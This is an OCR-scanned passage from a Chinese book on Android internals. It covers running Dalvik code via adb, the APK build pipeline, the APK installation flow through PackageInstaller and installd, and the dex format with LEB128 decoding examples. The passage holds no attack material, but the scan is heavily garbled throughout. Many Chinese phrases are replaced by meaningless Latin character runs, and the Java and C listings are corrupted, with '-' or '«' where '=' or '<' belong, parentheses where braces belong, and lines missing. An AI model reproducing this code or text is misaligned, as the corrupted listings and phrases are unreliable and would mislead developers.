adb shell dalvikvm -cp /data/local/HelloWorld.zip HelloWorld 


如 图 3-7 所 示 ， 如 果 没 有 错误 ， 命 令 执 行 后 会 输出 “Hello World"5£ fj 
串 。 


c C: AWWINDOWSAsystem32Xcnd. exe 


z: \woFkspaceNchapter3\3 .4\ .4.1>adhb push HelloWVorld.zip /data/local^/ 
9 KB/s €595 bytes in 8.830s5 


*TNworkspace*Nchapter3*3.4*3.4.1»5adb shell dalvikum -cp /data/local/HelloWVorld.zi 


p HelloWorld 
Hello World 


MN: *NvorkspaceNchapter3*N3.43.4.1»? 


图 3-7 adb shell FfAfTHelloWorld.zip 


3.55 “本 章 小结 


本 章 主要 介绍 了 Android 的 运行 环境 Dalvik 虚 拟 机 ， 并 对 比 了 Dalvik 虚 拟 
机 与 Java 虚 拟 机 的 差异 ， 随 后 介绍 了 Dalvik 的 指令 系统 。Dalvik 指 令 是 DEX 
文件 最 主要 的 组 成 部 分 ， 读 者 必须 熟练 掌握 这 一 部 分 的 内 容 。 另 外 ， 整 个 


Dalvik 指 令 集 的 数目 不 是 很 多 ， 语 法 上 面 也 比较 好 理解 ， 读 者 可 通过 手动 纺 
写 Dalvik 汇 编 代 码 来 熟悉 所 有 的 指令 ， 为 第 5 章 的 静态 分 析 打 好 基础 。 


第 4 章 ” Android 可 执行 文件 


可 执行 文件 是 操作 系统 的 基础 ， 它 反映 着 系统 的 运行 机 制 ，Android 系 
统 的 可 执行 文件 亦 是 如 此 。Google 公 司 使 用 Dalvik 虚 拟 机 作为 平台 软件 的 运 
行 环境 ， 并 为 这 个 平台 设计 了 一 个 专用 的 可 执行 文件 格式 DEX (Dalvik VM 
executes 的 缩写 ) 。 分 析 Android 程 序 大 多 数 时 间 是 在 和 DEX 文 件 打交道 ， 只 
有 掌握 DEX 文 件 的 格式 才能 更 加 深入 地 理解 Android 系 统 ， 才 能 对 软件 安全 
有 更 深刻 的 认识 。 


4.1 Android 程 序 的 生成 步骤 


Google 提 供 了 Android SDK 供 程序 员 来 开发 Android 平 台 的 软件 。 每 个 软 
件 在 最 终 发 布 时 会 打包 成 一 个 APK 文 件 ， 将 APK 文 件 传送 到 Android 设 备 中 
运行 即 可 安装 。APK 是 Android Package 的 缩写 ， 功 能 上 类 似 于 Symbian 系统 
的 SIS 文 件 ， 实 际 上 APK 文 件 就 是 一 个 zip 压 缩 包 ， 使 用 zip 格 式 解 压缩 软件 
对 APK 文 件 进行 解压 ， 会 发 现 它 由 一 些 图 片 资源 与 其 他 文件 组 成 ， 并 且 每 
个 APK 文 件 中 包含 一 个 classes.dex (odex 过 的 APK 除 外 ， 本 章 后 面 会 详细 讲 
解 ) ， 这 个 classes.dex 就 是 Android 系 统 Dalvik 虚 拟 机 的 可 执行 文件 ， 这 里 将 
其 简称 为 Dalvik 可 执行 文件 。 

Android 工 程 的 打包 有 两 种 方式 : 一 种 是 使 用 Eclipse 集成 开发 环境 直接 
导出 生成 APK; 另 一 种 是 使 用 Ant 工 具 在 命令 行 方式 下 打包 生成 APK。 不 管 
采用 哪 一 种 方式 ， 打 包 APK 的 过 程 实质 是 一 样 的 。Android 的 在 线 开发 文档 
“Develop > Tools ^ Building And Running” 中 提供 了 一 张 APK 文 件 的 构建 流程 
图 ， 如 图 4-1 所 示 ， 整 个 编译 打包 过 程 由 多 个 步骤 完成 。 


图 4-1 APK 的 打包 过 程 


从 APK 打 包 流 程 图 可 以 看 出 ， 整 个 APK 打 包 过 程 分 为 以 下 七 个 步骤 : 

第 一 步 : 打包 资源 文件 ， 生 成 R.java 文 件 。 打 包 资 源 的 工具 aapt 位 于 
android-sdk\platform-tools 目 录 下 ， 该 工具 的 源码 在 Android 系 统 源 码 的 
frameworks\basevtoolsvaapt 目 录 下 ， 生 成 的 过 程 主 要 是 调用 了 aapt 源 码 目录 下 
Resource.cpp X. fft 中 的 buildResources() K ZX , — iz A ZX Bj 7c dv S 
AndroidManifest.xml 的 合法 性 ， 然 后 对 res 目 录 下 的 资源 子 目 录 进 行 处 理 ， 处 
ie BJ ER 2A 7J makeFileResources() ， 处 理 的 内 容 包 括 资 源 文 件 名 的 合法 性 检 

， 向 资源 表 table 添 加 条 目 等 ， 处 理 完 后 调用 compileResourceFile0) 孙 数 编 
译 res 与 asserts 目 录 下 的 资源 并 生成 resources.arsc 文 件 ，compileResourceFile() 

汶 数 位 于 aapt 源 码 目录 的 ResourceTable.cpp 文 件 中 ， 该 函数 最 后 会 调用 

parseAndAddEntry() 函数 生成 R.java 文 件 ， 完 成 资源 编译 后 ， 接 下 来 调用 
compileXmlFile0 孙 数 对 res 目 录 的 子 目 录 下 的 xml 文 件 分 别 进 行 编译 ， 这 样 
处 理 过 的 xml 文 件 就 简单 的 被 “加 密 ” 了 ， 最 后 将 所 有 的 资源 与 编译 生成 的 
resources.arsc X fF LJ A " TJ] ” 33 BJ AndroidManifest.xml X {F fJ £ Fk 4 PR 
resources.ap_ 文 件 (使 用 Ant 工 具 命 令 行 编译 则 会 生成 与 build.xml 中 “project 
name” 指 定 的 属性 同名 的 ap_ 文 件 ) o 

第 二 步 : 处 理 aidl 文 件 ， 生 成 相应 的 Java 文 件 。 对 于 没有 使 用 到 aidl 的 
Android 工 程 ， 这 一 步 可 以 跳 过 。 这 一 步 使 用 到 的 工具 为 aidl， 位 于 android- 
sdk\platform-tools 目 录 下 ，aidl 工 具 解 析 接 口 定义 文件 (aidl7J android 
interface definition language 的 首 字母 缩写 ， 即 Android 接 口 描述 语言 并 生成 
相应 的 Java 代 码 供 程序 调用 ， 有 兴趣 的 朋友 可 以 查看 它 的 源码 ， 位 于 
Android 源 码 的 frameworks\base\tools\aidl 目 录 下 。 

第 三 步 : 编译 工程 源 代码 ， 生 成 相应 的 class 文 件 。 这 一 步调 用 javac 编 
译 工 程 src 目 录 下 所 有 的 java 源 文件 ， 5 T BSbin classes 
目录 下 ， 上 图 4-1 假 定编 译 工程 源 代码 时 程序 是 基于 Android SDK 开 发 的 ， 
实际 开发 过 程 中 ， 有 可 能 会 使 用 Android NDK 来 编译 native 代 码 ， 因 此 ， 
如 果 可 能 的 话 ， 这 一 步 还 需要 使 用 Android NDK 编 译 C/C++ 代 码 ， 当 然 ， 编 
以 提前 到 第 一 步 或 第 二 步 。 


第 四 步 : 转换 所 有 的 class 文 件 ， 生 成 classes.dex 文 件 。 前 面 曾 多 次 提 
到 ，Android 系 统 Dalvik 虚 拟 机 的 可 执行 文件 为 DEX 格 式 ， 程 序 运行 所 需 的 
classes.dex 就 是 在 这 一 步 生 成 的 ， 使 用 到 的 工具 为 dx ， 它 位 于 android- 
sdkvplatform-tools 目 录 下 ，dx 工 具 主要 的 工作 是 将 Java 字 节 码 转换 为 Dalvik 
字 节 码 、 上 压缩 常量 闻 、 消 除 见 余 信息 等 。 

第 五 步 : 打包 生成 APK 文 件 。 打 包 的 工具 为 apkbuilder， 它 位 于 android- 
sdk\tools 目 录 下 ，apkbuilder 为 一 个 脚本 文件 ， 实 际 调用 的 是 android- 
sdk\tools\lib\sdklib.jar 文 件 中 的 com.android.sdklib.build.ApkBuilderMain 类 。 
c 的 实现 代码 位 于 Anod 系统 源 B 的 
sdk\sdkmanager\libs\sdklib\src\com\android\sdklib\build\ApkBuilderMain.java X 
件 ， 代 码 构建 了 一 个 ApkBuilder 类 ， 然 后 以 包含 resources.arsc 的 文件 为 基础 
生成 apk 文 件 ， 这 个 文件 一 般 为 ap_ 结 尾 的 文件 ， 接 着 调用 addSourceFolder() 
长 数 添加 工程 的 资源 ，addSourceFolder0O 会 调用 processFileForResource(O) 国 数 
往 apk 文 件 中 添加 资源 ， 处 理 的 内 容 包 括 res 目 录 与 assets 目 录 中 的 文件 ， 添 
加 完 资 源 后 调用 addResourcesFromJar0 国 数 往 apk 文 件 中 写 入 依赖 库 ， 接 着 
调用 addNativeLibraries0 国 数 添 加 工程 libs 目 录 下 的 Native 库 (通过 Android 
NDK 编 译 生成 的 so 或 bin 文 件 ) ， 最 后 调用 sealApk() 关 闭 apk 文 件 。 

第 六 步 : 对 APK 文 件 进 行 签名 。Android 的 应 用 程序 需要 签名 才能 在 
Android 设 备 上 安装 ， 签 名 apk 文 件 有 两 种 情况 : 一 种 是 在 调试 程序 时 进行 签 
名 ， 使 用 Eclipse 开发 Android 程 序 时 ， 在 编译 调试 程序 时 会 自己 使 用 一 个 
debug.keystore 对 apk 进 行 签名 ; 另 一 种 是 打包 发 布 时 对 程序 进行 签名 ， 这 种 
情况 下 需要 提供 了 一 个 符合 Android 开 发 文档 中 要 求 的 签名 文件 。 签 名 的 方 
法 也 有 两 种 : 一 种 是 使 用 JDK 中 提供 的 jarsigner 工 具 签 名 ; 另 一 种 是 使 用 
Android 源 码 中 提供 的 signapk 工 具 ， 它 的 代码 位 于 Android 系 统 源 码 的 
build\tools\signapk 目 录 下 。 

第 七 步 : 对 签名 后 的 APK 文 件 进行 对 齐 处 理 。 这 一 步 需要 使 用 到 的 工 
具 为 zipalign， 它 位 于 android-sdk\tools 目 录 ， 源 码 位 于 Android 系 统 源 码 的 
build\tools\zipalign 目 录 ， 它 的 主要 工作 是 将 apk 包 进行 对 齐 处 理 ， 使 apk 包 中 
的 所 有 资源 文件 距离 文件 起 始 偏 移 为 4 字 节 整数 倍 ， 这 样 通过 内 存 映射 访问 


apk 文 件 时 的 速度 会 更 快 ， 验 证 apk 文 件 是 否 对 齐 过 的 工作 由 ZipAlign.cpp 文 
件 的 verifyO 函 数 完 成 ， 处 理 对 齐 的 工作 则 由 process0 国 数 完成 。 


4.2 ” Android 程序 的 安装 流程 


eis 总 结 一 下 有 以 下 四 种 安装 方式 : 

.系统 程序 安装 : 开机 时 安装 ， 这 类 安装 没有 安装 界面 。 

2. 通过 Android 市 场 安装 : 直接 通过 Android 市 场 进 行 网 络 安装 ， 这 类 
安装 没有 安装 界面 。 

3. ADB 工 具 安装 : 使 用 ADB 工 具 进 行 安装 ， 这 类 安装 没有 安装 界面 。 

4. 手机 自 带 安装 : 通过 SD 卡 里 的 APK 文 件 安装 ， 这 类 安装 有 安装 界 
面 。 

第 1 种 方式 是 由 开机 时 启动 的 PackageManagerService 服 务 完 成 的 ， 这 个 
服务 在 启动 时 会 扫描 系统 程序 目录 /system/app 并 重新 安装 所 有 程序 ;第 2 种 
方式 直接 通过 Android 市 场 下 载 APK 文 件 进行 安装 ， 目 前 国内 大 多 数 Android 
手机 没有 集成 Google Play 商店 ， 用 户 多 数 情况 下 是 使 用 其 它 的 Android 市 场 
来 安装 apk 程 序 ， 这 样 的 话 ， 安 装 方式 与 第 4 种 基本 一 样 了 ; 第 3 种 方式 比较 
简单 ， 使 用 Android SDK 提 供 的 调试 桥 adb 来 安装 ， 在 命令 行 下 输入 adb 
install xxx.apk (xxx 为 apk 文 件 名 ) 即 可 完成 安装 ; 第 4 种 方式 是 通过 点 击 手 
机 中 文件 浏览 器 里 面 的 apk 文 件 ， 直 接 调 用 Android 系 统 的 软件 包 
packageinstaller.apk 来 完成 安装 。 本 小 节 主 要 通过 分 析 packageinstaller.apk 的 
实现 步骤 来 了 解 apk 文 件 的 安装 过 程 。 

当 用 户 通过 Android 手 机 中 的 文件 管理 程序 定位 到 需要 安装 的 apk 程 序 ， 
只 需 点 击 apk 程 序 就 会 出 现 如 图 4-2 所 示 的 界面 ， 点 击 安装 按钮 即 可 开始 安 
装 ， 点 击 取 消 按 钮 则 返回 。 
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A 硬件 控件 


A 手机 通话 
如 手 机 状态 和 身 人 


A 系统 工具 
方 目 手机 休眠 , 修改 全 局 系统 


全 部 显示 


安装 取消 


图 4-2 ”APK 程 序 安装 界面 


这 个 安装 界面 其 实 是 Android 系统 程序 Packagelnstaller 的 
PackageInstallerActivity， 当 Android 系 统 请 求 到 需要 安装 apk 程 序 时 ， 会 启动 
这 个 Activity， 并 接收 通过 Intent 传 递 过 来 的 apk 文 件 信息 ，PackageInstaller 的 
源码 位 于 Android 系统 源码 的 packages\apps\PackagelInstaller 目 录 ， 当 
PackagelnstallerActivity 启动 时 ， 会 首先 初始 化 一 个 PackageManager 与 
PackageParserPackage 对 象 ， 接 着 调用 PackageUtil 类 的 静态 方法 
getPackageInfo() 解 析 程 序 包 的 信息 ， 如 果 这 一 步 解 析出 错 ， 程 序 就 会 失败 返 
回 ， 如 果 成 功 就 调用 setContentView() 方 法 设置 PackageInstallerActivity 的 显 
示 视 图 ， 接 着 调用 PackageUtil 类 的 静态 方法 getAppSnippet( 与 
initSnippetForNewApp0 来 设置 PackageInstallerActivity 的 控件 显示 程序 的 名 


称 与 图 标 ， 最 后 调用 initiateInstall0 方 法 进行 一 些 其 它 的 初始 化 工作 。 
PackageInstallerActivity 的 onCreate 代 码 如 下 。 


protected void onCreate(Bundle icicle) { 
super.onCreate(icicle); 
//get intent information 
final Intent intent - getIntent(); 
mPackageURI = intent.getData(); // 获 取 传 递 过 来 的 apk 文 件 信息 
mPm = getPackageManager(); // 获 取 包 管理 器 
mPkgInfo = PackageUtil.getPackageInfo (mPackageURI); // 解 析 apk 文 件 


// Check for parse errors 

if(mPkgInfo -- null) ( 
Log.w(TAG, "Parse error when parsing manifest. Discontinuing 
installation"); 
showDialogInner(DLG PACKAGE ERROR); // 解 析出 错 弹 出 出 错 对 话 框 
setPmResult(PackageManager.INSTALL FAILED INVALID APK); 
return; 


) 


//set view 

setContentView(R.layout.install start); / /设置 视图 

mInstallConfirm = findViewById(R.id.install confirm panel); 

mInstallConfirm.setVisibility(View.INVISIBLE); 

PackageUtil.AppSnippet as - PackageUtil.getAppSnippet(this, 
mPkgInfo.applicationInfo, mPackageURI); // 获 取 apk 的 程序 名 与 图 标 

PackageUtil.initSnippetForNewApp(this, as, R.id.app snippet); // 设 置 

apk 的 程序 名 与 图 标 


// Deal with install source. 
String callerPackage - getCallingPackage(); 
if (callerPackage !- null && intent.getBooleanExtra( 


Intent.EXTRA NOT UNKNOWN SOURCE, false)) ( 


try ( 
mSourceInfo = mPm.getApplicationInfo(callerPackage, 0); // 获 取 
程序 信息 
if (mSourceInfo !- null) { 
if ((mSourceInfo.flags&ApplicationInfo.FLAG SYSTEM) !- O)( 
/7 系统 程序 


// System apps don't need to be approved. 
initiateInstall();// 其 他 初始 化 工作 


return; 


SharedPreferences prefs = getSharedPreferences(PREFS __ 
ALLOWED SOURCES, Context.MODE PRIVATE); 
if (prefs.getBoolean(mSourceInfo.packageName, false)) { 
// User has already allowed this one. 
initiateInstall(); // 其 它 初始 化 工作 
return; 
) 
//ask user to enable setting first 
showDialogInner(DLG ALLOW SOURCE); // 弹 出 “新 的 应 用 来 源 ” 对 话 框 
return; 
*y 
} 
} catch (NameNotFoundException e) ( 
) 
) 
// Check unknown sources. 
if (l!isInstallingUnknownAppsAllowed()) ( 
//ask user to enable setting first 
showDialogInner (DLG UNKNOWN APPS); // 弹 出 局 用 “未 知 来 源 ” 对 话 框 
return; 
) 
initiateInstall(); // 其 他 初始 化 工作 


整个 onCreate() 方 法 有 两 个 水 数 是 重点 : 一 个 是 PackageUtil 的 
getPackageInfo()757A; 另 一 个 是 initiateInstall() 方 法 。 getPackageInfo()75 7A F1 
首先 通过 packageURI 获 取 到 apk 文 件 的 路 径 ， 然 后 构造 了 一 个 PackageParser 
对 象 ， 最 后 调用 PackageParser 对 象 的 parsePackage() 方 法 解析 apk 程 序 包 ， 
parsePackage(0) 方 法 代码 比较 长 ， 大 致 代 码 如 下 。 


public Package parsePackage(File sourceFile, String destCodePath, 

DisplayMetrics metrics, int flags) ( 

try i 
assmgr - new AssetManager(); 
int cookie = assmgr.addAssetPath(mArchiveSourcePath); 

) catch (Exception e) ( 
Slog.w(TAG, "Unable to read AndroidManifest.xml of " 

+ mArchiveSourcePath, e); 


try ( 
// XXXX todo: need to figure out correct configuration. 
pkg = parsePackage(res, parser, flags, errorText); 


) catch (Exception e) ( 


return pkg; 
} 


parsePackage() 调 用 了 另 一 个 版 本 的 parsePackage() 方 法 ， 代 码 如 下 : 


private Package parsePackage( 
Resources res, XmlResourceParser parser, int flags, String[] outError) 
throws XmlPullParserException, IOException ( 


String pkgName - parsePackageName(parser, attrs, flags, outError); 


final Package pkg = new Package(pkgName); 


while ((type - parser.next()) !- XmlPullParser.END DOCUMENT 
&& (type !- XmlPullParser.END TAG || parser.getDepth() > outerDepth)) ( 
if (type == XmlPullParser.END TAG || type -- XmlPullParser.TEXT) { 
continue; 


} 
String tagName = parser.getName(); 
if (tagName.equals("application")) ( 


foundApp - true; 


if (!parseApplication(pkg, res, parser, attrs, flags, outError)) ( 
return null; 


) 


) else if (tagName.equals("permission-group")) { 


DIDI 


else if (tagName.equals("eat-comment")) ( 


) else if (RIGID PARSER) ( 


...... 


} else { 
Slog.w(TAG, "Unknown element under «manifest»: " + parser.getName () 
+" at " + mArchiveSourcePath + " " 
+ parser.getPositionDescription()); 
XmlUtils.skipCurrentTag (parser); 


continue; 


return pkg; 
} 


代码 首先 调用 parsePackageName() 方 法 从 AndroidMenifest.xml 文 件 中 获 
取 程 序 包 名 ， 接 着 构建 了 一 个 Package 对 象 ， 接 下 来 挨个 处 理 
AndroidMenifest.xml 文 件 中 的 标签 ， 处 理 application 标签 使 用 了 


parseApplication() 方 法 ， 后 者 解析 activity、receiver、service、provider 并 将 
它们 添加 到 传递 进来 的 Package 对 象 的 ArrayList 中 。 
onCreate() 方 法 中 getPackageInfo() 返回 后 调用 了 initiateInstall()， 
initiateInstall0) 检 测 该 程序 是 否 已 经 安装 ， 然 后 分 别 调用 startInstallConfirm() 
显示 安装 界面 或 调用 showDialogInner (DLG_REPLACE_APP) 弹 出 替换 程序 
对 话 框 。startInstallConfirm() 方 法 设置 了 安装 与 取消 按钮 的 监听 器 ， 最 后 是 
a 法 的 按钮 点 击 响应 了 ， 安 装 按钮 使 用 startActivity() 方 法 启动 了 一 
个 Activity 类 InstallAppProgress.class ， InstallAppProgress 类 在 初始 化 
ru 方法 中 调用 initView() ， 后 者 最 终 调 用 了 PackageManager 的 
installPackage() 方 法 来 安装 apk 程 序 。installPackage() 为 PackageManager 类 的 
一 个 虚 阔 数 ，PackageManagerService.java 实 现 了 它 ，installPackage() 调 用 了 
1 s 方法 ， 该 方法 首先 验证 调用 者 是 否 具 有 程序 
装 的 权限 ， 最 后 通过 消息 处 理 的 方式 调用 processPendingInstall() 进 行 安 
: , processPendingInstall() X 33] FH. 7 installPackageLI(), installPackageLI() 75 
法 经 过 一 阵 验 证 折腾 ， 最 终 调 用 replacePackageLI0O 或 installNewPackageLIO 
来 替换 或 安装 程序 ， 代 码 如 下 : 


private void installPackageLI(InstallArgs args, 
boolean newInstall, PackageInstalledInfo res) { 
int pFlags - args.flags; 
String installerPackageName - args.installerPackageName; 
File tmpPackageFile - new File(args.getCodePath()); 
// Set application objects path explicitly after the rename 
setApplicationInfoPaths(pkg, args.getCodePath(), args.getResourcePath()); 
pkg.applicationInfo.nativeLibraryDir - args.getNativeLibraryPath(); 
if (replace) ( 
replacePackageLI(pkg, parseFlags, scanMode, //THÉ&U ZR 
installerPackageName, res); 
) else ( 
installNewPackageLI(pkg, parseFlags, scanMode, // T JEN 


installerPackageName,res); 


安装 与 替换 操作 的 代码 都 比较 长 ， 但 它们 最 终 都 会 调用 scanPackageLI() 
方法 ，scanPackageLIO 会 实例 化 一 个 PackageParser 对 象 ， 然 后 调用 其 
parsePackage() 方 法 来 解析 apk 程 序 包 ， 代 码 的 最 后 又 调用 了 scanPackageLI() 
的 另 一 个 版 本 ， 第 二 个 版 本 的 scanPackageLIO 完 成 apk 的 依赖 库 检 测 、 签 名 
的 验证 、sharedUser 的 签名 检查 、 更 新 Native 库 目录 文件 、 组 件 名 称 的 检查 
等 工作 ， 最 后 调用 mInstaller 的 install() 方 法 来 安装 程序 。mInstaller 为 mnstaller 
类 的 一 个 实例 ， Installer 类 的 源码 位 于 Android 源码 
frameworks\base\services\java\com\android\server\pm\Installer.java X un , 
install0 方 法 构造 字符 串 “install name uid gid” AW FBtransaction() 73 7 , 
socket 向 /system/bin/installd f Fr 发 3& install 指令 installd B 7m 43 n E 
frameworksW5aseWmdsNnstalld EH 3€ ， 这 个 程序 是 开机 后 常 驻 于 内 存 中 的 ， 可 
以 通过 在 adb shell 下 运行 “ps|grep/system/bin/installd” 查 看 进程 信息 。installd 
处 理 install 指 令 的 函数 为 installd.c 文 件 中 的 do_install0 ，do_install0 调 用 了 
install()， 后 者 在 commands.c 文 件 中 有 它 的 实现 代码 。 大 致 如 下 : 


int install(const char *pkgname, uid t uid, gid t gid) 


if (create pkg path(pkgdir, pkgname, PKG DIR POSTFIX, 0)) ( // 创 建 包 路 径 
ALOGE("cannot create package pathMn"); 


return -1; 


if (create pkg path(libdir, pkgname, PKG LIB POSTFIX, 0)) ( // 创 建 库 路 径 
ALOGE("cannot create package lib path*Mn"); 


return -1; 


if (mkdir(pkgdir, 0751) < 0) ( // 创 建 包 目录 
ALOGE("cannot create dir '$s': %s\n", pkgdir, strerror (errno)); 
return -errno; 


if (chmod(pkgdir, 0751) < 0) ( // 设 置 包 目 录 权 限 
ALOGE("cannot chmod dir '$s': %s\n", pkgdir, strerror(errno)); 
unlink(pkgdir); 
return -errno; 


if (mkdir(libdir, 0755) « 0) ( / /创建 库 目 录 
ALOGE("cannot create dir '$s': %s\n", libdir, strerror(errno)); 
unlink(pkgdir); 
return -errno; 


if (chmod(libdir, 0755) « 0) ( // 设 置 库 目录 权限 
ALOGE("cannot chmod dir '$s': %s\n", libdir, strerror (errno)); 
unlink(libdir); 
unlink(pkgdir); 
return -errno; 


if (chown(libdir, AID SYSTEM, AID SYSTEM) < 0) ( ， // 设 置 库 目录 的 所 有 者 
ALOGE("cannot chown dir '$s': %s\n", libdir, strerror(errno)); 
unlink(libdir); 
unlink(pkgdir); 
return -errno; 


} 

if (chown(pkgdir, uid, gid) < 0) ( // 设 置 包 目 录 的 所 有 者 
ALOGE("cannot chown dir '$s': $sWMn", pkgdir, strerror(errno)); 
unlink(libdir); 
unlink(pkgdir); 
return -errno; 

) 

return 0; 


install() 执 行 完 后 ， 会 通过 socket 回 传 结 果 ， 最 终 PackagelInstaller 根 据 返 
回 结果 做 出 相应 的 处 理 ， 至 此 ， 一 个 apk 程 序 就 安装 完成 了 。 


43 ”dex 文 件 格 式 


f£ Android 4.0 源 码 Dalvik/docs 目 录 下 提供 了 一 份 文 档 dex-format.html， 
里 面 详细 的 介绍 了 dex 文 件 格 式 以 及 使 用 到 的 数据 结构 。 与 Dalvik 指 令 集 文 
档 一 样 ， 该 文档 在 Android 4.1 源 码 中 也 已 经 去 除 。 


4.3.1 dex 文件 中 的 数据 结构 


开始 讲解 dex 文 件 格 式 前 ， 先 看 看 dex 文 件 中 用 到 的 数据 类 型 。 如 表 4-1 
所 示 。 


表 4-1 dex 文件 使 用 到 的 数据 类 型 


ul 等 同 于 uint8_t， 表 示 1 字 节 的 无 符号 数 
u2 等 同 于 uintl6 t， 表 示 2 E T S 
u4 等 同 于 uint32 t， 表 示 4 字 节 的 无 符号 数 
u8 等 同 于 uintó4 t, dm 8 字 节 的 无 符号 数 

| sleb128 有 符号 LEB128， 可 变 长 度 1~5 字 节 
uleb128 无 符号 LEB128， 可 变 长 度 1-5 字 节 
uleb128pl 无 符号 LEB128 值 加 1， 可 变 长 度 1~5 字 节 


ul~u8 很 好 理解 ， 表 示 1 到 8 字 节 的 无 符号 数 ， 而 sleb128、uleb128 与 
uleb128p1 则 是 dex 文 件 中 特有 的 LEB128 数 据 类 型 。 其 中 ， 每 个 LEB128 由 1 
~5 个 字 节 组 成 ， 所 有 的 字 节 组 合 在 一 起 表示 一 个 32 位 的 数据 ， 如 图 4-3 所 
示 ， 每 个 字 节 只 有 7 位 为 有 效 位 ， 如 果 第 1 个 字 节 的 最 高 位 为 1， 表 示 
LEB128 需 要 使 用 到 第 2 个 字 节 ， 如 果 第 2 个 字 节 的 最 高 位 为 1， 表 示 会 使 用 
到 第 3 个 字 节 ， 以 此 类 推 ， 直 到 最 后 的 字 节 最 高 位 为 0， 当 然 ，LEB128 最 多 
只 会 使 用 到 5 个 字 节 ， 如 果 读 取 5 个 字 节 后 下 一 个 字 节 最 高 位 仍 为 1， 则 表示 
该 dex 文 件 无 效 ，Dalvik 虚 拟 机 在 验证 dex 时 会 失败 返回 。 


Bitwise diagram of a two-byte LEB128 value 
First byte Second byte 


1 bitg bits bit4 bita bito bit; bito |O bit13 bit12 ,bit11 bit1o bito bitg bit; 


图 4-3 LEB128 数 据 类 型 


在 Android 系 统 源码 dalvilNlibdex\Leb128.h 文 件 中 可 以 找到 LEB128 的 实 
现 ， 读 取 无 符号 LEB128 (uleb128) 数据 的 代码 如 下 : 


DEX INLINE int readUnsignedLeb128(const ul** pStream) ( 


const ul* ptr - *pStream; 

int result = *(ptr++); 

if (result » Ox7f) ( // 大 于 0x7f 表 示 第 1 个 字 节 最 高 位 为 1 
int cur = *(ptr++); // 第 2 个 字 节 


result = (result & 0x7f) | ((cur & 0x7f) << 7); // 前 2 个 字 节 组 合 


if (cur > Ox7f) ( // 大 于 0x7f 表 示 第 2 个 字 节 最 高 位 为 1 
cur = *(ptr--*); /7 第 3 个 字 节 
result |= (cur & 0x7f) << 14; // 前 3 个 字 节 的 组 合 
if (cur » Ox7f) ( 
cur = *(ptr*-*); // 第 4 个 字 节 
result |= (cur & 0x7f) << 21; // 前 4 个 字 节 的 组 合 
iE (cur » Ox7t£) (1 
cur = *(ptr44); // 第 5 个 字 节 
result |= cur «« 28; // 前 5 个 字 节 的 组 合 


) 
*pStream - ptr; 
return result; 


) 


对 于 有 符号 的 LEB128 (sleb128) 来 说 ， 计 算 方法 与 无 符号 的 LEB128 
是 一 样 的 ， 只 是 对 无 符号 LEB128 最 后 一 个 字 节 的 最 高 有 效 位 进行 了 符号 扩 
展 。 读 取 有 符号 LEB128 数 据 的 代码 如 下 : 


DEX INLINE int readSignedLeb128(const ul** pStream) ( 


const ul* ptr - *pStream; 
int result = *(ptr++); 
if (result <= Ox7f) ( 
result - (result «« 25) »» 25; Meca 
) else ( 
int cur = *(ptr++); /7 第 2 个 字 节 
result = (result & 0x7f) | ((cur & 0x7f) «« 7); 
lif (cur «- Ox7E£) y 
result - (result «« 18) »» 18; /7 对 如 
) else ( 
cur = *(ptr**); 11% dil 
result |= (cur & Ox7f) << 14; / / Bi 34" 
if (cur «- Ox7f) ( 
result = (result «« 11) >> 11; 
) else ( 
cur = * (ptr++); // 第 4 个 
result |= (cur & 0x7f) << 21; // 前 4 个 字 
lf (cur «sz OxT7Tf) f 
result = (result «« 4) >> 4; 
) else ( 
cur = *(ptr**); // 第 5 个 
result |= cur << 28; // 前 5 个 
} 
} 
} 
} 
*pStream = ptr; 


return result; 
H 


uleb128p1 类 型 很 简单 ， 它 的 值 为 uleb128 的 值 加 1。 
以 字符 序列 “c0 83 92 25” 为 例 ， 计 算 它 的 uleb128 值 。 


// 对 结果 进行 符 4 


ETE 

f 
D 

J 


/小 于 0x7E 表 示 第 1 个 字 节 的 最 高 位 不 为 1 


的 最 高 有 效 位 进行 符号 扩展 


// 前 2 个 字 节 组 合 


吉 果 进行 符号 位 扩展 


了 位 扩展 


+ 


t Pa 


LE 


组 


// 对 结果 进行 符号 位 扩展 


第 1 个 字 节 0xc0 大 于 0x7f， 表 示 需 要 用 到 第 2 个 字 节 。resultl = 0xc0 & 


Ox7f 


第 2 个 字 节 0x83 大 于 0x7f， 表 示 需 要 用 到 第 3 个 字 节 。result2 = resultl + 


(0x83 & 0x7f) << 7 


第 3 个 字 节 0x92 大 于 0x7f， 表 示 需 要 用 到 第 4 个 字 节 。result3 = result2 + 


(0x92 & 0x7f) << 14 


第 4 个 字 节 0x25 小 于 0x7f， 表 示 到 了 结尾 。result4 = result3 + (0x25 & 
0x7f) << 21 

最 后 计算 结果 为 0x40 + 0x180 + 0x48000 + 0x4a00000 = 0x4a481c0 

以 字符 序列 “dl c2 b3 40” 为 例 ， 计 算 它 的 sleb128 值 。 

第 1 个 字 节 0xd1 大 于 0x7f， 表 示 需 要 用 到 第 2 个 字 节 。resultl = 0xd1 & 
Ox7f 

第 2 个 字 节 0xc2 大 于 0x7f， 表 示 需 要 用 到 第 3 个 字 节 。result2 = resultl + 
(0xc2 & Ox7f) << 7 

第 3 个 字 节 0xb3 大 于 0x7f， 表 示 需 要 用 到 第 4 个 字 节 。result3 = result2 + 
(0xb3 & 0x7f) << 14 

第 4 个 字 节 0x40 小 于 0x7f， 表 示 到 了 结尾 。result4 = (( result3 + (0x40 & 
0x7f << 21) << 4) >> 4 

最 后 计算 结果 为 ((0x51 + 0x2100 + 0xcc000 + 0x8000000) << 4 ) >>4 = 
Oxf80ce151 


4.3.2 ”dex 文 件 整 体 结构 


dex 文 件 的 整体 结构 比较 简单 ， 它 是 由 多 个 结构 体 组 合 而 成 的 。 如 图 4-4 
所 示 ， 一 个 dex 文 件 由 7 个 部 分 组 成 。dex header 为 dex 文 件 头 ， 它 指定 了 dex 
文件 的 一 些 属性 ， 并 记录 了 其 它 6 部 分 数据 结构 在 dex 文 件 中 的 物理 偏 移 。 
string_ids 到 class_def 结 构 可 以 理解 为 “索引 结构 区 ”， 真 实 的 数据 存放 在 data 
数据 区 ， 最 后 的 link_data 为 静态 链接 数据 区 ， 对 于 目前 生成 的 dex 文 件 而 
言 ， 它 始终 为 空 。 


dex header 
string ids 
type ids 

proto ids 


field ids 


method ids 
class def 


data 


link data 


图 4-4 dex 文件 结构 
未 经 过 优化 的 dex 文 件 结构 表示 如 下 。 


struct DexFile ( 


DexHeader Header; 

DexStringId StringIds[stringIdsSize]; 
DexTypeId TypelIds[typeldsSize]; 
DexProtoId ProtoIds[protoIdsSize]; 
DexFieldId FieldIds[fieldIdsSize]; 
